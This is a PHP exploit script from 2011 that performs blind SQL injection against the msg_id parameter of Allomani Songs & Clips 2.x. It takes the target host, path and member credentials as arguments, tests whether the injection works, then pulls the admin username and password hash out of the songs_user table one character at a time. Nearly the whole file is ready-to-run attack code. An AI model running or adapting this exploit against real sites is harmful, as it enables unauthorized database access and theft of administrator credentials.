<?php
/*
===============================================================
Allomani Songs & Clips 2.x (msg_id) Blind SQL Injection Exploit
===============================================================
#[+]Version : 2.x
#[+]Author : ahwak2000
#[+]home : tryag.cc/cc/ ~ p0c.cc/vb/
#[+]Date : 13.08.2011
#[+]E-mail : z.u5[at]hotmail.com
#[+]secript home: http://allomani.com
#[+]Tested On: win xp sp3
===============================================================
*/
ini_set("max_execution_time",0);
print_r('
___________________________
________________________| Allomani 2.x eXploit 0d4y |_________________________
_ _ _ _ _ _ _ _ _____ _____ _____ _____
/ _ \ | | | | | | __ | | / _ \ | |// | _ | / _ \ / _ \ / _ \
| |_| | | |_| | | | / \ | | | |_| | | \ |_| / / | | | | | | | | | | | |
| | | | | _ | | |/ /\ \| | | | | | | |\ \ / /__ | |_| | | |_| | | |_| |
|_| |_| |_| |_| |___/ \___| |_| |_| |_| \_\ |_____| \_____/ \_____/ \_____/
_______________________________________________________________________________
z.u5@hotmail.com
');
if ($argc<5) {
print_r('
-----------------------------------------------------------------------------
example: php '.$argv[0].' allomain.com /demo/ user_pass user_id
-----------------------------------------------------------------------------
');
die;
}
function AHWAK($victim,$vic_dir,$user_pass,$user_id,$inj){
$host = $victim;
$p = "http://".$host.$vic_dir;
//$cookie = base64_encode(":".$inj.":");
$packet ="GET ".$p."/usercp.php?action=msg_reply&msg_id=89".$inj." HTTP/1.0\r\n";
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n";
$packet.="Host: ".$victim."\r\n";
$packet.="Cookie: songs_member_data_id=".$user_id."; songs_member_data_password=".md5($user_pass).";\r\n";
$packet.="Pragma: no-cache\r\n";
$packet.="Connection: Close\r\n\r\n";
$o = @fsockopen($host, 80);
if(!$o){
echo "\n[x] No response...\n";
die;
}
fputs($o, $packet);
while (!feof($o)) $data .= fread($o, 1024);
fclose($o);
$_404 = strstr( $data, "HTTP/1.1 404 Not Found" );
if ( !empty($_404) ){
echo "\n[x] 404 Not Found... Make sure of path. \n";
die;
}
return $data;
}
function AHWAK_GET($from){
preg_match_all("(<textarea .*>(.*)</textarea>)siU", $from, $out);
return $out[1][0];
}
$host1 = $argv[1];
$dir1=$argv[2];
$userpass=$argv[3];
$userid=$argv[4];
if ($argc > 4) {
echo "\nPlease wait...\r\n\r\n";
$login= AHWAK($host1,$dir1,$userpass,$userid,"");
if(!eregi ("profile",$login)){
echo "\n\n\t[-] You have entered an invalid username or password.\n\n\n";
exit;
}
$truths = AHWAK_GET(AHWAK($host1,$dir1,$userpass,$userid,"' and 1='1/*"));
$falses = AHWAK_GET(AHWAK($host1,$dir1,$userpass,$userid,"' and 1='2/*"));
if ($truths == $falses) {
echo "\n\t sorry: magic_quotes_gpc = On ): \n";
exit;
}
echo "\n\t[+] Getting Admin UserName And PassWord\n\n\t";
echo "\n\t-----------------------------------\n\n";
for ($g = 1; $g <= 16; $g++) { //eidt
for ($i = 46; $i <= 122; $i++) {
$qest = AHWAK_GET(AHWAK($host1,$dir1,$userpass,$userid,"'+and+ascii(MiD((sElEct+concat_ws(0x3a,username,password)+frOm+songs_user+liMit 0,1),".$g.",1))='".$i."/*"));
if ($qest == $truths) {
echo chr($i);
}
}
}
echo "\n\n\t-----------------------------------\n\n\tBy Ahwak2000\n\n";
